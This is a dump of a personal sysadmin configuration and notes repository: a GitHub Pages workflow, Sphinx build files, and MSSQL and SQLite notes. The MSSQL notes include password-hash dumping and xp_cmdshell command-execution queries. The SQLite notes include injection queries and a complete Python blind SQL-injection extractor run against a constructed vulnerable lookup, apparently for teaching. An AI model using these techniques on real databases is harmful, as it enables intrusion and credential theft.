├── .github
│   └── workflows
│       └── publish_gh_pages.yml
├── .gitignore
├── LICENSE
├── Makefile
├── README
├── README.rst
├── _static
│   └── GitHub-Mark-32px.png
├── _templates
│   └── sourcelink.html
├── build_rawrst.py
├── conf.py
├── database
│   ├── index.rst
│   ├── microsoft-mssql.rst
│   ├── mysql.rst
│   └── sqlite.rst
├── etc-desktop
│   ├── X11
│   │   └── xorg.conf.d
│   │       ├── 00-french-keyboard.conf
│   │       └── 50-synaptics.conf
│   ├── avahi
│   │   └── avahi-daemon.conf
│   └── index.rst
├── etc-server
│   ├── bitlbee
│   │   ├── bitlbee.conf
│   │   └── bitlbee.conf.rst
│   ├── dhcp
│   │   ├── dhcpd.conf
│   │   ├── dnsmasq.conf
│   │   └── dnsmasq.conf.rst
│   ├── dns
│   │   ├── unbound-with-stubby.conf
│   │   └── unbound.conf
│   ├── index.rst
│   ├── jabber
│   │   └── ejabberd.rst
│   ├── mail.rst
│   ├── mysql
│   │   └── my.cnf
│   └── web
│       ├── apache.conf
│       ├── collectd.rst
│       ├── gitweb.rst
│       ├── lighttpd.conf
│       ├── nginx.conf
│       ├── php.rst
│       └── ssl.rst
├── etc
│   ├── audit
│   │   └── audit.rules
│   ├── hosts
│   ├── index.rst
│   ├── iptables
│   │   ├── empty.rules
│   │   ├── iptables-desktop.rules
│   │   └── iptables-server.rules
│   ├── nftables-server.conf
│   ├── ntp.conf
│   ├── resolv.conf
│   ├── samba
│   │   └── smb.conf
│   ├── ssh
│   │   ├── sshd_config
│   │   └── sshd_config.default
│   ├── sudoers
│   ├── sysctl.conf
│   └── wireguard.rst
├── index.rst
├── sysadmin
│   ├── archlinux-pkg.rst
│   ├── bluetooth.rst
│   ├── debian-dev.rst
│   ├── debian.rst
│   ├── gdb.rst
│   ├── index.rst
│   ├── installation.rst
│   ├── nat.rst
│   ├── netconfig.rst
│   ├── netconsole.rst
│   ├── perf-linux.rst
│   ├── pxe-boot-server.rst
│   ├── qemu.rst
│   ├── qubes-os.rst
│   ├── raspberrypi.rst
│   ├── remote-desktop-linux.rst
│   ├── selinux.rst
│   ├── sound.rst
│   ├── systemd.rst
│   ├── tmpfs.rst
│   ├── traffic-shaping.rst
│   ├── user.rst
│   └── wireshark-https.rst
├── windows
│   ├── Vagrantfile
│   ├── active_directory.rst
│   ├── cmd.rst
│   ├── hardening_script.bat
│   ├── index.rst
│   ├── install.rst
│   ├── key_shortcuts.rst
│   ├── oneliners-commands.rst
│   ├── utc-clock.rst
│   ├── vagrant.rst
│   ├── vbscript.rst
│   └── windbg-kd.rst
└── www
    ├── htdocs
    │   ├── 403.html
    │   ├── 404.html
    │   ├── 500.html
    │   ├── 50x.html
    │   ├── down.html
    │   ├── favicon.ico
    │   ├── index-nothing.html
    │   └── robots.txt
    └── index.rst
--------------------------------------------------------------------------------
/.github/workflows/publish_gh_pages.yml:
--------------------------------------------------------------------------------
name: Build and publish GitHub pages

on: [push, pull_request]

jobs:
  build_pages:
    runs-on: ubuntu-latest
    # Least privilege: the deploy step pushes to gh-pages with the workflow
    # token, so request that scope explicitly instead of relying on the
    # repository default (which may be read-only). Sphinx executes conf.py,
    # so pull requests from forks run untrusted code here; this stays
    # acceptable only because such runs get a read-only token and no secret.
    permissions:
      contents: write
    steps:
      - uses: actions/checkout@v4

      - name: Install dependencies
        run: |
          sudo apt-get update
          sudo apt-get install -y make python3-sphinx

      - run: make all

      - name: Upload HTML artifacts
        uses: actions/upload-artifact@v4
        with:
          name: html
          path: _build/html
          if-no-files-found: error

      # Update GitHub pages
      - run: make clean

      - name: Configure git user and email
        run: |
          git config --global user.email "deployer@github.local"
          git config --global user.name "GitHub Actions Deployer"

      - name: Check out gh-pages in _build/html
        run: |
          mkdir -p _build/html
          git -C _build/html init
          git -C _build/html remote add --fetch origin "$(git config remote.origin.url)"
          if git -C _build/html rev-parse --verify origin/gh-pages ; then
            git -C _build/html checkout gh-pages &&
            git -C _build/html rm -rf . ;
          else
            git -C _build/html checkout --orphan gh-pages ;
          fi
          # Disable Jekyll engine
          touch _build/html/.nojekyll
          # Add a CNAME file
          printf doc.iosenag.net > _build/html/CNAME

      - name: Build Github pages with Sphinx
        run: make html

      - name: Show the diff
        run: |
          git -C _build/html add -A
          git -C _build/html diff --cached

      - name: Commit the new pages
        run: |
          if git -C _build/html status --short | grep '^' ; then
            git -C _build/html add -A
            git -C _build/html commit --allow-empty -m "Sphinx build of ${{ github.sha }}"
            git -C _build/html format-patch -n1 --stdout > _build/gh-pages.patch
          fi

      - name: Upload changes in artifacts
        uses: actions/upload-artifact@v4
        with:
          name: gh-pages.patch
          path: _build/gh-pages.patch

      - name: Deploy GitHub Pages
        if: success() && github.event_name == 'push' && github.ref == 'refs/heads/master'
        run: |
          git -C _build/html remote add pushable-origin "https://x-access-token:${{ github.token }}@github.com/${{ github.repository }}"
          git -C _build/html push --quiet pushable-origin gh-pages
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
*~
*.backup
*.bak
.*.sw[op]

*.raw.rst
/_build
.vagrant/
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
# Makefile for Sphinx documentation
#

# You can set these variables from the command line.
SPHINXOPTS    =
SPHINXBUILD   = sphinx-build
PAPER         =
BUILDDIR      = _build
PYTHON        = python3

# Directories which contain raw files
RAW_DIRS = etc etc-desktop etc-server windows www

# Internal variables.
PAPEROPT_a4     = -D latex_paper_size=a4
PAPEROPT_letter = -D latex_paper_size=letter
ALLSPHINXOPTS   = -d $(BUILDDIR)/doctrees $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) .
# the i18n builder cannot share the environment and doctrees with the others
I18NSPHINXOPTS  = $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) .

.PHONY: all help clean html singlehtml raw-rst

all: html

help:
	@echo "Please use \`make <target>' where <target> is one of"
	@echo "  html        to make standalone HTML files"
	@echo "  singlehtml  to make a single large HTML file"

clean:
	-rm -rf $(BUILDDIR)/*
	find $(RAW_DIRS) -name '*.raw.rst' -delete

html: raw-rst
	$(SPHINXBUILD) -b html $(ALLSPHINXOPTS) $(BUILDDIR)/html
	@echo
	@echo "Build finished. The HTML pages are in $(BUILDDIR)/html."

singlehtml: raw-rst
	$(SPHINXBUILD) -b singlehtml $(ALLSPHINXOPTS) $(BUILDDIR)/singlehtml
	@echo
	@echo "Build finished. The HTML page is in $(BUILDDIR)/singlehtml."

# Custom target to make raw-rst files
raw-rst:
	$(PYTHON) build_rawrst.py $(RAW_DIRS)
--------------------------------------------------------------------------------
/README:
--------------------------------------------------------------------------------
Generic Configuration README
============================

.. image:: https://github.com/fishilico/generic-config/actions/workflows/publish_gh_pages.yml/badge.svg
    :target: https://github.com/fishilico/generic-config/actions/workflows/publish_gh_pages.yml

https://fishilico.github.io/generic-config/

Overview
--------
This project aims to give a quick technical perspective of the configuration
files I need to modify to get a system which fits my needs in terms of security
and usability.

Disclaimer
----------
*This project is NOT intended to be a tutorial or a reference for anyone else*.
There is absolutely **NO WARRANTY** that the content of this project gives you
a safe and usable configuration. Please consider these files as a cheat-sheet or
as some kind of last-resort documentation to look at when you really do
not know how to configure a piece of software.

History
-------
Whenever I install a new Linux machine there are config files that need to be
edited. For example, on a server it's a good idea to disable remote ``root``
login after an administrator account has been created. Another example happens
when a desktop computer needs a basic firewall (only to prevent this
computer from being open to the four winds): which rules should I configure?

At first I wrote some text files and memos to keep track of these things.
However, system administration of a few personal hosts (servers and desktop
workstations) becomes really hard when you have no way to keep
configuration "in sync with your mind".

Another issue occurred several years ago. One of my friends who was new to IPv6
wanted to know what rules I was using in the ``ip6tables`` firewall of my
server. I gave him a kind of "anonymized file" with rules which were not
specific to my server and he found out that there were some problems with IPv6
fragmentation. Therefore I needed to add some rules and to update the firewall
of every host I had.

So I started my `Generic Configuration` project to create a place where I
could write down the non-specific files I can show to my friends and to other
people. In order to get feedback on my notes, I made this project
public, with a Git tree hosted by GitHub. Nowadays the HTML pages are hosted by
GitHub Pages, and a GitHub Actions workflow
(``.github/workflows/publish_gh_pages.yml``) has been configured to rebuild
the pages every time branch ``master`` is updated.

When you are reading the files I've written, please keep in mind that no host
in the world would run with only the things I describe, as they most likely
require some slight customization from their sysadmins.

Finally, I use a version control system (Git) to ease the way people can
contribute to this project. So if you find a bug and file an issue or a pull
request to help me improve this project, that would be really nice! The project
is located on https://github.com/fishilico/generic-config.

Structure
---------

This project is organized in folders by field:

- ``etc``: common files in the ``/etc`` folder which are in every host
- ``etc-desktop``: desktop-specific configuration of some ``/etc`` files
- ``etc-server``: config files of services which can be found on a server
- ``sysadmin``: some thoughts and tips&tricks about system administration
- ``windows``: content related to using Microsoft Windows systems
- ``www``: content of ``/var/www`` on a web server without specific purpose

License
-------
This project is licensed under
Creative Commons Attribution Share Alike 4.0 International (CC-BY-SA-4.0).
--------------------------------------------------------------------------------
/README.rst:
--------------------------------------------------------------------------------
README
--------------------------------------------------------------------------------
/_static/GitHub-Mark-32px.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fishilico/generic-config/2593f3f7d5f0a891e278d773c0cd3b2120b656f0/_static/GitHub-Mark-32px.png
--------------------------------------------------------------------------------
/_templates/sourcelink.html:
--------------------------------------------------------------------------------
{%- if show_source and has_source and sourcename %}

{{ _('This Page') }}

{%- endif %}
--------------------------------------------------------------------------------
/build_rawrst.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# -*- coding:UTF-8 -*-
"""Build RST files to display raw files in Sphinx"""

import os
import os.path
import sys


# Templates
RAWRST_HEADER = """``{dirpath}/{filename}``
{underline}
:download:`Download file<{filename}>`

"""


def build_rawrst_file(dirpath, filename):
    """Build the corresponding raw RST file for filename in dirpath"""
    # Refuse path separators: the name is embedded verbatim in RST directives
    if '/' in filename or '\\' in filename:
        raise ValueError("Invalid filename: {}".format(filename))

    content = RAWRST_HEADER
    if filename.endswith(('.ico', '.jpg', '.png')):
        content += '.. image:: {filename}\n    :alt: {dirpath}/{filename}\n'
    else:
        content += '.. literalinclude:: {filename}\n'
        if filename.endswith(('.htm', '.html')):
            content += '    :language: html\n'
        elif filename.endswith(('.ini', '.inf')):
            content += '    :language: ini\n'
        elif 'apache' in filename:
            content += '    :language: apache\n'
        elif 'lighttpd' in filename:
            content += '    :language: lighttpd\n'
        elif 'nginx' in filename:
            content += '    :language: nginx\n'
        else:
            content += '    :language: sh\n'

    content = content.format(
        dirpath=dirpath,
        filename=filename,
        # Title is ``dirpath/filename``: 2 + 1 + 2 extra characters
        underline='=' * (len(dirpath) + len(filename) + 5))

    with open(os.path.join(dirpath, filename + '.raw.rst'), 'w') as rstfd:
        rstfd.write(content)


def build_rawrst_dir(dirpath):
    """Build all needed raw RST files under dirpath"""
    for root, dirs, files in os.walk(dirpath):
        # Filter-out hidden directories such as .vagrant
        dirs[:] = [d for d in dirs if not d.startswith('.')]
        for filename in files:
            if filename.lower().endswith(('~', '.bak', '.rst')):
                continue
            # Ignore files already associated with a .rst
            if os.path.exists(os.path.join(root, filename + '.rst')):
                continue
            build_rawrst_file(root, filename)


if __name__ == '__main__':
    # sys.argv[0] is the script itself, only the directories follow it
    for directory in sys.argv[1:]:
        build_rawrst_dir(directory)
--------------------------------------------------------------------------------
/conf.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Generic Configuration build configuration file, created by
# sphinx-quickstart on Sun Dec 29 22:54:32 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

import sys, os

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))

# -- General configuration -----------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# The encoding of source files.
#source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = 'Generic Config'
copyright = '2013-2023, Nicolas Iooss'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']

# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []


# -- Options for HTML output ---------------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
#html_theme = 'default'
html_theme = 'nature'

# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []

# The name for this set of Sphinx documents.  If None, it defaults to
# "<project> v<release> documentation".
html_title = project

# A shorter title for the navigation bar.  Default is the same as html_title.
#html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs.  This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}

# If false, no module index is generated.
#html_domain_indices = True

# If false, no index is generated.
#html_use_index = True

# If true, the index is split into individual pages for each letter.
#html_split_index = False

# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it.  The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None

# Output file base name for HTML help builder.
htmlhelp_basename = 'GenericConfigdoc'


# -- Options for LaTeX output --------------------------------------------------

latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',

# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',

# Additional stuff for the LaTeX preamble.
#'preamble': '',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
  ('README', 'GenericConfig.tex', 'Generic Configuration',
   'Nicolas Iooss', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False

# If true, show page references after internal links.
#latex_show_pagerefs = False

# If true, show URL addresses after external links.
#latex_show_urls = False

# Documents to append as an appendix to all manuals.
#latex_appendices = []

# If false, no module index is generated.
#latex_domain_indices = True


# -- Options for manual page output --------------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('README', 'genericconfig', 'Generic Configuration',
     ['Nicolas Iooss'], 1)
]

# If true, show URL addresses after external links.
#man_show_urls = False


# -- Options for Texinfo output ------------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
  ('README', 'GenericConfig', 'Generic Configuration',
   'Nicolas Iooss', 'GenericConfig', 'One line description of project.',
   'Miscellaneous'),
]

# Documents to append as an appendix to all manuals.
#texinfo_appendices = []

# If false, no module index is generated.
#texinfo_domain_indices = True

# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
--------------------------------------------------------------------------------
/database/index.rst:
--------------------------------------------------------------------------------
Databases
=========

This section contains information about some database engines

.. toctree::
   :maxdepth: 2
   :glob:

   *
--------------------------------------------------------------------------------
/database/microsoft-mssql.rst:
--------------------------------------------------------------------------------
Microsoft SQL Server
====================

MSSQL queries
-------------

Show the version of the database:

.. code-block:: mysql

    SELECT @@version
    GO

List available databases:

.. code-block:: mysql

    SELECT name FROM sys.Databases;
    SELECT * FROM master..sysdatabases;

List available tables from a database:

.. code-block:: mysql

    USE msdb;
    SELECT name FROM sys.Tables

    SELECT name FROM sysobjects WHERE xtype='U';

List columns of a table:

.. code-block:: mysql

    SELECT syscolumns.* FROM syscolumns
    JOIN sysobjects ON syscolumns.id=sysobjects.id
    WHERE sysobjects.name='my_table'

Enumerate users (type "``U``" is for ``WINDOWS_LOGIN``, like the ``NT AUTHORITY\SYSTEM`` account, and "``S``" is for ``SQL_LOGIN``, like the ``sa`` account; reading ``password_hash`` requires the ``CONTROL SERVER`` permission):

.. code-block:: mysql

    SELECT principal_id, sid, name, type, type_desc, credential_id, owning_principal_id
    FROM master.sys.server_principals

    -- With passwords (John The Ripper format "mssql")
    SELECT name, password FROM sysxlogins;
    -- since MSSQL 2005 (JtR format "mssql05", after adding "0x" prefix to hashes):
    SELECT name, password_hash FROM sys.sql_logins;

Run system commands (this requires the ``ALTER SETTINGS`` server permission, which the ``sysadmin`` and ``serveradmin`` roles hold; the option is persistent, so set it back to ``0`` once done):

.. code-block:: mysql

    EXEC master.dbo.sp_configure 'show advanced options', 1
    RECONFIGURE
    EXEC master.dbo.sp_configure 'xp_cmdshell', 1
    RECONFIGURE
    GO

    xp_cmdshell "whoami"
    GO


Docker container on Linux
-------------------------

In order to use a MSSQL server on a development workstation, a Docker image can be used.
Microsoft provides an image for both Linux and Windows environments.
This is documented on https://docs.microsoft.com/en-us/sql/linux/quickstart-install-connect-docker?view=sql-server-2017&pivots=cs1-bash and the building scripts are published on https://github.com/Microsoft/mssql-docker.

Steps on Linux:

* Enable Docker overlay2 storage driver (cf. https://docs.docker.com/storage/storagedriver/overlayfs-driver/#configure-docker-with-the-overlay-or-overlay2-storage-driver).
  Write this in ``/etc/docker/daemon.json``:

  .. code-block:: json

      {
        "storage-driver": "overlay2"
      }

* Pull Microsoft Docker image (cf. https://hub.docker.com/_/microsoft-mssql-server):

  .. code-block:: sh

      docker pull mcr.microsoft.com/mssql/server:2017-latest

* Run a server (the port is bound to ``127.0.0.1`` only, so the ``sa`` account is not reachable from the network; a password passed with ``-e`` nevertheless stays visible in the shell history and in ``docker inspect`` output):

  .. code-block:: sh

      docker run -e 'ACCEPT_EULA=Y' -e 'SA_PASSWORD=yourStrong(!)Password' -p 127.0.0.1:1433:1433 --name mssql -d mcr.microsoft.com/mssql/server:2017-latest

* Run SQL commands on the server (if the ``-Q`` option is not used, an interactive prompt appears and the user needs to enter ``GO`` in order to launch queries and ``QUIT`` to exit):

  .. code-block:: sh

      docker exec -it mssql /bin/bash
      /opt/mssql-tools/bin/sqlcmd -S localhost -U sa -P "$SA_PASSWORD" -Q 'SELECT @@SERVERNAME'

On Windows, the Docker image is available on https://hub.docker.com/r/microsoft/mssql-server-windows-developer/
--------------------------------------------------------------------------------
/database/sqlite.rst:
--------------------------------------------------------------------------------
SQLite
======

Introduction
------------

SQLite is a database engine that directly uses a file, for example named ``db.sqlite``.
There is therefore no need to authenticate the database users in order for them to access the data: everything is managed by the access control of the file itself.
More precisely, when modifying the database, the directory that stores the database file also needs to be writable by the engine, in order to create and remove a journal file.

SQLite can be used by applications to store settings, user information, messages, etc.
Its engine is also used by projects such as OSQuery in order to benefit from a SQL interpreter.


Basic commands
--------------

In order to dump the content of a database file named ``db.sqlite`` from the command line:

.. code-block:: sh

    sqlite3 < /dev/null -bail -batch -cmd .dump db.sqlite

From the interactive prompt given by ``sqlite3``, it is possible to run SQL statements as well as special SQLite commands, prefixed with a dot.

.. code-block:: sh

    # Show available commands and some help
    .help

    # Show the version
    .version
    SELECT SQLITE_VERSION();

    # Quit
    .exit

    # List tables from the database
    .tables
    # Dump the schema of every table of the database
    .schema

    # List tables and dump the schema, for tables whose names start with "user"
    .tables user%
    .schema user%

    # Change the output mode of SELECT statements (the default is "list" in
    # sqlite3 and "pretty" in osqueryi):
    # * Each cell in a new line
    .mode line
    # * Comma-separated values
    .mode csv
    # * Fixed-width columns
    .mode column
    .width 10 20 50 50 5
    # * Pretty tables (osqueryi only; stock sqlite3 has ".mode table" and ".mode box")
    .mode pretty
    # * Pipe-separated values (the default one in SQLite)
    .mode list


SQL statements
--------------

SQLite supports standard SQL statements: ``SELECT``, ``INSERT INTO``, ``UPDATE``, ``DELETE``, etc.
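The following script is an added example written for this page; it is not taken from the page's author nor from the SQLite project. It turns the statements of this section and the ``HEX``/``SUBSTR``/``LENGTH``/``GROUP_CONCAT`` technique of the "Schema table" section below into a complete blind-injection run against an in-memory database built from the ``users`` table of that section. The lookup ``user_exists_vulnerable`` is a hypothetical endpoint that concatenates its argument into the SQL text, the sample data is constructed for the example, and ``BlindExtractor`` recovers the whole of ``sqlite_master`` using nothing but the true/false answer of that lookup; ``user_exists_safe`` shows the parameter-bound form that closes the hole. Only the Python standard library is used.

```python
"""Blind extraction of sqlite_master through a boolean SQL injection oracle.

Added example (not from the page nor from the SQLite project): the database,
its content and the vulnerable lookup are all constructed here.
"""
import sqlite3

# Constructed sample schema and data (the table definition is the one shown in
# the "Schema table" section of the page).
SAMPLE_SCHEMA_SQL = """
CREATE TABLE IF NOT EXISTS `users` (
    `uid` INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
    `name` TEXT NOT NULL,
    `email` VARCHAR(255) UNIQUE NOT NULL,
    `password` VARCHAR(110) NOT NULL,
    `admin` TINYINT(1) NOT NULL DEFAULT '0',
    `created` DATETIME NOT NULL
);
INSERT INTO users (name, email, password, admin, created)
    VALUES ('alice', 'alice@example.com', 'x', 1, '2024-01-01 00:00:00');
"""

# Expression from the page that concatenates every row of sqlite_master.
SCHEMA_DUMP_EXPR = (
    "GROUP_CONCAT(type||';'||name||';'||tbl_name||';'||rootpage||';'"
    "||COALESCE(sql,''),'^')"
)
HEX_DIGITS = "0123456789ABCDEF"  # HEX() returns upper-case digits


def open_sample_db():
    """Create the in-memory database used by the example."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA_SQL)
    return conn


def user_exists_vulnerable(conn, name):
    """Hypothetical vulnerable lookup: the name is pasted into the SQL text."""
    query = "SELECT 1 FROM users WHERE name = '%s'" % name
    return conn.execute(query).fetchone() is not None


def user_exists_safe(conn, name):
    """Hardened lookup: the name is bound as a parameter, never parsed as SQL."""
    query = "SELECT 1 FROM users WHERE name = ?"
    return conn.execute(query, (name,)).fetchone() is not None


class BlindExtractor:
    """Drive the vulnerable lookup as a boolean oracle and count the queries."""

    def __init__(self, conn):
        self.conn = conn
        self.queries = 0

    def oracle(self, condition):
        """True iff the SQL condition holds, judged only from the lookup result."""
        # Close the string literal, AND the attacker condition with a name that
        # exists, then re-open a literal so the original closing quote parses.
        payload = "alice' AND (%s) AND 'x'='x" % condition
        self.queries += 1
        return user_exists_vulnerable(self.conn, payload)

    def blind_int(self, expr, max_value=1 << 16):
        """Recover an integer-valued expression by binary search."""
        low, high = 0, max_value
        while low < high:
            mid = (low + high) // 2
            if self.oracle("(%s) > %d" % (expr, mid)):
                low = mid + 1
            else:
                high = mid
        return low

    def blind_hex_digit(self, char_expr):
        """Recover one hex digit with four oracle queries (binary search)."""
        low, high = 0, len(HEX_DIGITS) - 1
        while low < high:
            mid = (low + high) // 2
            if self.oracle("(%s) > '%s'" % (char_expr, HEX_DIGITS[mid])):
                low = mid + 1
            else:
                high = mid
        return HEX_DIGITS[low]

    def blind_string(self, expr):
        """Recover a text expression through HEX(), LENGTH() and SUBSTR()."""
        hex_expr = "HEX(%s)" % expr
        length = self.blind_int("LENGTH(%s)" % hex_expr)
        digits = [self.blind_hex_digit("SUBSTR(%s,%d,1)" % (hex_expr, pos))
                  for pos in range(1, length + 1)]
        return bytes.fromhex("".join(digits)).decode("utf-8")

    def extract_schema(self):
        """Recover the concatenated sqlite_master rows through the oracle."""
        return self.blind_string("(SELECT %s FROM sqlite_master)" % SCHEMA_DUMP_EXPR)


def direct_schema_dump(conn):
    """Ground truth: the same expression run directly, without the oracle."""
    return conn.execute("SELECT %s FROM sqlite_master" % SCHEMA_DUMP_EXPR).fetchone()[0]


if __name__ == "__main__":
    db = open_sample_db()
    extractor = BlindExtractor(db)
    schema = extractor.extract_schema()
    print("Recovered with %d oracle queries:" % extractor.queries)
    for row in schema.split("^"):
        print("  " + row.replace("\n", "\n  "))
    print("Identical to a direct SELECT:", schema == direct_schema_dump(db))
```

Running it prints the three ``sqlite_master`` rows shown in the "Schema table" section and the number of queries spent: a short binary search on the length, then four queries per hex digit, which is also the cost such an oracle has against a real target. The hex encoding is what makes the comparison safe, since every recovered character is then one of sixteen known ASCII digits regardless of what the schema contains.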

Several ``SELECT`` statements can be merged together using:

* ``UNION ALL`` to concatenate the results;
* ``UNION`` to concatenate the results, removing the duplicated rows;
* ``INTERSECT`` to only keep the rows in common;
* ``EXCEPT`` to exclude some rows.

It is also possible to join tables (``LEFT JOIN``, ``INNER JOIN``, etc.) using conditions expressed as:

.. code-block:: sql

    SELECT * FROM users LEFT JOIN user_groups ON users.uid = user_groups.uid;
    SELECT * FROM users LEFT JOIN user_groups USING (uid);

When performing a ``SELECT`` statement, it is possible to group rows sharing a common value using ``GROUP BY column``.
In order to filter results before grouping, it is possible to use a ``WHERE condition`` clause.
To filter results after grouping, the clause to use is ``HAVING condition``.

The filters may use ``LIKE`` to match cells according to a pattern.
The pattern can use ``_`` as a wildcard for a single character and ``%`` as a wildcard for any number of characters.
In order to escape ``_``, engines such as MSSQL use a syntax like ``[_]``, but SQLite uses something else:

.. code-block:: sql

    SELECT * FROM objects WHERE name LIKE 'prefix\_%' ESCAPE '\';

To print timestamps as a human-readable date, there exists a function, ``DATETIME``.
For example:

.. code-block:: sql

    SELECT DATETIME(users.last_update_time, 'unixepoch') FROM users;

Schema table
------------

According to the documentation, every SQLite database contains a single "schema table" named ``sqlite_master`` that stores the schema for that database.

.. code-block:: sql

    sqlite> .schema sqlite_master
    CREATE TABLE sqlite_master (
      type text,
      name text,
      tbl_name text,
      rootpage integer,
      sql text
    );

To understand its content in an actual database, let's create a new table in an empty database.

.. code-block:: sql

    DROP TABLE IF EXISTS `users`;
    CREATE TABLE IF NOT EXISTS `users` (
      `uid` INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
      `name` TEXT NOT NULL,
      `email` VARCHAR(255) UNIQUE NOT NULL,
      `password` VARCHAR(110) NOT NULL,
      `admin` TINYINT(1) NOT NULL DEFAULT '0',
      `created` DATETIME NOT NULL
    );

After executing these statements, the schema table contains the ``CREATE TABLE`` statement and other objects:

.. code-block:: text

    sqlite> SELECT * FROM sqlite_master;
    table|users|users|2|CREATE TABLE `users` (
      `uid` INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
      `name` TEXT NOT NULL,
      `email` VARCHAR(255) UNIQUE NOT NULL,
      `password` VARCHAR(110) NOT NULL,
      `admin` TINYINT(1) NOT NULL DEFAULT '0',
      `created` DATETIME NOT NULL
    )
    index|sqlite_autoindex_users_1|users|3|
    table|sqlite_sequence|sqlite_sequence|4|CREATE TABLE sqlite_sequence(name,seq)

From a SQL injection vulnerability, this table can be obtained using queries such as:

.. code-block:: sql

    -- Concatenate all fields and select the 1st entry (using COALESCE to support NULL values)
    SELECT type||';'||name||';'||tbl_name||';'||rootpage||';'||COALESCE(sql,'') FROM sqlite_master
    LIMIT 0,1;

    -- Concatenate all fields of all rows
    SELECT GROUP_CONCAT(type||';'||name||';'||tbl_name||';'||rootpage||';'||COALESCE(sql,''),'^')
    FROM sqlite_master;

To exfiltrate the characters of such a string, the functions ``HEX``, ``SUBSTR`` and ``LENGTH`` (documented in SQLite's Built-In Scalar SQL Functions page) can be used.
For example:

.. code-block:: sql

    sqlite> SELECT HEX('hello');
    68656C6C6F
    sqlite> SELECT LENGTH(HEX('hello'));
    10
    sqlite> SELECT SUBSTR(HEX('hello'),1,1)='6';
    1
    sqlite> SELECT SUBSTR(HEX('hello'),1,1)>'9';
    0
--------------------------------------------------------------------------------
/etc-desktop/X11/xorg.conf.d/00-french-keyboard.conf:
--------------------------------------------------------------------------------
# Read and parsed by systemd-localed. It's probably wise not to edit this file
# manually too freely.
Section "InputClass"
    # Other systems may use: Identifier "evdev keyboard catchall"
    # and MatchDevicePath "/dev/input/event*"
    Identifier "system-keyboard"
    MatchIsKeyboard "on"
    Option "XkbLayout" "fr"
    Option "XkbModel" "pc105"
    # Variant "latin9" is advertised as the legacy alternative one
    # (it provides some special characters through AltGr+key combos).
    # Variant "oss" is the current most useful layout to write in French.
